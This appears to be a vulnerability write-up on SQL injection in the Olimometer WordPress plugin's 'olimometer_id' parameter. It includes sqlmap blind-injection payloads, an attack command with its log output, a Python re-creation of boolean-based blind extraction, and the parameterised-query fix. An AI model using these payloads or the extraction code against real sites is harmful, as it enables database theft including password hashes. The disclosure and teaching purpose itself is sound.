Vulnerable parameter: `olimometer_id=`

Detection with sqlmap:

```
Parameter: olimometer_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: olimometer_id=1 AND 6227=6227

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: olimometer_id=1 AND SLEEP(5)
```

Through SQL injection in the `olimometer_id` parameter we were able to obtain the database name from the example.com test instance. With a vulnerability of this kind, running sqlmap with other options (for example `--dump`) can retrieve the entire database, including usernames and password hashes.

Attack example, as follows:

```
root@kali:~# sqlmap -u http://EXAMPLE.COM/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 --dbs --threads=5 --random-agent --no-cast
---
Parameter: olimometer_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: olimometer_id=1 AND 6227=6227

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: olimometer_id=1 AND SLEEP(5)
---
[11:14:21] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[11:14:21] [INFO] fetching database names
[11:14:21] [INFO] fetching number of databases
[11:14:21] [INFO] retrieved:
[11:14:21] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[11:14:21] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:14:26] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
[11:14:26] [ERROR] unable to retrieve the number of databases
[11:14:26] [INFO] falling back to current database
[11:14:26] [INFO] fetching current database
[11:14:26] [INFO] retrieving the length of query output
[11:14:26] [INFO] retrieved:
[11:14:28] [INFO] heuristics detected web page charset 'ascii'
14
[11:15:26] [INFO] retrieved: *****_wrdp1
available databases [1]:
[*] *****_wrdp1
```

Note that sqlmap could not count the databases and fell back to the current one, switching off multi-threading because time-based inference is unreliable under concurrent requests; recovering the 14-character name therefore took about a minute.
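The following is an added example, not code from the page or from the Olimometer plugin. It reconstructs, in Python over an in-memory SQLite database, the bug class sqlmap reports above (an integer GET parameter concatenated straight into the query) next to a hardened handler, and then implements the boolean-based blind inference that sqlmap uses to pull a value out through the true/false page difference, character by character. The table `olimometer`, its columns and rows, and the handler names `vulnerable_lookup` / `hardened_lookup` are assumptions made for this example; the plugin's real schema and code are not shown on the page. SQLite has no `SLEEP()`, so the time-based variant is not simulated, and the extracted value is a table name rather than MySQL's `database()`.

```python
import sqlite3

# Constructed stand-in for the plugin's storage (assumption: the real
# table layout is not shown on the page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE olimometer (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO olimometer VALUES (?, ?)",
                     [(1, "Fundraiser"), (2, "Server costs")])
    return conn

def vulnerable_lookup(conn, olimometer_id):
    """Hypothetical vulnerable handler: the raw request value is glued into the query."""
    sql = "SELECT title FROM olimometer WHERE id = " + olimometer_id
    return [row[0] for row in conn.execute(sql)]

def hardened_lookup(conn, olimometer_id):
    """Fixed handler: enforce the integer type, then bind the value as a parameter."""
    try:
        oid = int(olimometer_id)          # "1 AND 6227=6227" is rejected here
    except (TypeError, ValueError):
        return []
    return [row[0] for row in
            conn.execute("SELECT title FROM olimometer WHERE id = ?", (oid,))]

def oracle(conn, condition):
    """Boolean-based blind oracle: True when the injected condition keeps row 1
    in the result, the same true/false page comparison sqlmap makes with
    '1 AND 6227=6227' versus a false condition."""
    return len(vulnerable_lookup(conn, "1 AND (" + condition + ")")) > 0

def blind_extract(conn, subquery, max_len=64):
    """Recover the scalar result of `subquery` without ever seeing it: first its
    length, then each character, both by bisection over the oracle. This is the
    inference sqlmap performs when it reports 'retrieving the length of query
    output' and then the value itself."""
    lo, hi = 0, max_len
    while lo < hi:                        # bisect the length
        mid = (lo + hi) // 2
        if oracle(conn, f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126                  # bisect one printable ASCII character
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "1 AND 6227=6227"))   # ['Fundraiser']  true page
    print(vulnerable_lookup(db, "1 AND 6227=6228"))   # []              false page
    print(blind_extract(db, "SELECT name FROM sqlite_master WHERE type='table'"))  # olimometer
    print(hardened_lookup(db, "1 AND 6227=6227"))     # []  payload rejected
    print(hardened_lookup(db, "1"))                   # ['Fundraiser']
```

Each oracle call stands for one HTTP request; the length and every character cost about seven requests each, which is why sqlmap's blind techniques are slow and why the log above shows it waiting on a statistical model before reading a single 14-character name. In a WordPress plugin the equivalent of `hardened_lookup` is casting the request value with `absint()` and passing it through `$wpdb->prepare()` with a `%d` placeholder rather than interpolating it into the query string.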